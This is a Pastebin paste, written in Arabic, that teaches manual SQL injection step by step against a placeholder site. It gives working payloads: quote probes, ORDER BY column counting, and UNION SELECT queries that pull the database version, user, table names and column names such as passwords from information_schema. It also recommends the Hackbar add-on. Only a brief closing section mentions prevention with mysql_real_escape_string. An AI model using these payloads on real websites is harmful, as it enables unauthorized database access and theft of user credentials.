Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- للقيام بحقن قواعد البيانات بشكل يدوى اولا يتتطلب منك معرفة اعداد الاعمدة داخل قاعدة البيانات عن طريق المثال الاتى: http://example.com/index.php?id=1
- مثال لحقن القاعدة الان :
- id=1'
- او
- id=1 <مسافة بعد رقم واحد>
- او
- id=1\
- اذا كانت القاعدة مصابة بثغرة حقن قواعد البيانات فسيظهر لك الرسالة التالية
- مثال:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and LanguageID=0' at line 1
- بعد ذلك نبدا فى معرفة عدد الاعمدة داخل قاعدة البيانات مثلا :
- http://example.com/index.php?id=1' order by 20 #
- مثلا سوف يظهر لك كالتالى خطا اخر فيه :
- Unknown column '20' in 'order clause'
- ده معناه لا يوجد عمود رقم 20
- ندخل مثلا http://example.com/index.php?id=1' order by 19 #
- نبدا فى ادخال ارقام اقل من 20 مثلا 19 اذا ظهر نفس الخطا
- Unknown column '19' in 'order clause'
- نحاول مرة اخرى مع 18 او 17 او 16 او 15 الى ان يختفى الخطا تماما وتظهر لنا الصفحة بشكل عادى ولا يوجد بها اى خطأ عندها نعلم كم عدد الاعمدة داخل هذه القاعدة وليكن العدد 7 سوف يصبح كالتالى :
- http://example.com/index.php?id=-1' union select 1,2,3,4,5,6,7 #
- لاحظ هنا غيرنا العدد الى سالب او عدد كبير مثلا 343435345435 وبعد ذلك استخدمنا دالة union select لكى نشير على سبيل المثال :
- http://example.com/index.php?id=-1' union select 1,version(),3,4,5,6,7 #
- version of database = version() فيرجن قاعدة البيانات
- مثلا : version as 5.0.1 or 4.3
- ممكن ان تبدل version() ب database() او user()
- مثال اسم الداتا بيز db_test
- مثال اسم اليوزر localhost@adminuser_test
- المرحلة الثالثة نبدا فى معرفة اسم الجدول table_name
- على سبيل المثال :
- http://example.com/index.php?id=-1' union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database() #
- سوف يظهر مثلا كالتالى:
- administrator,category,product,users هؤلاء هم اسماء الجداول داخل قاعدة البيانات
- بعد ذلك نريد ان نظهر اسماء الاعمدة عن طريق :
- http://example.com/index.php?id=-1' union select 1,2,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() #
- سوف يظهر لك على سبيل المثال كالتالى :
- email_id,password,admin_id,user_name,password,user_type
- لاحظ هذه المعلومات الخطيرة التى ظهرت لك انت ممكن عن طريق تنفيذ اوامر ايضا فى قاعدة البيانات ان تعرضها وتكون معرضة للسرقة
- ملحوظة توجد اداة تضاف الى الفايرفوكس تسمى Hackbar
- https://addons.mozilla.org/en-US/firefox/addon/hackbar/
- كيفية منع حقن البيانات توجد وظيفة موجودة فى ال mysql
- : على سبيل المثال تسمى
- mysql_real_escape_string
- طريقة استخدامها على سبيل المثال:
- $query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'",
- mysql_real_escape_string($user),
- mysql_real_escape_string($password));
- انصحك بمتابعة هذه السلسلة من الفيديوهات على الانترنت ابحث عنها ستجدها
- hitesh choudharymaster sql injection
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement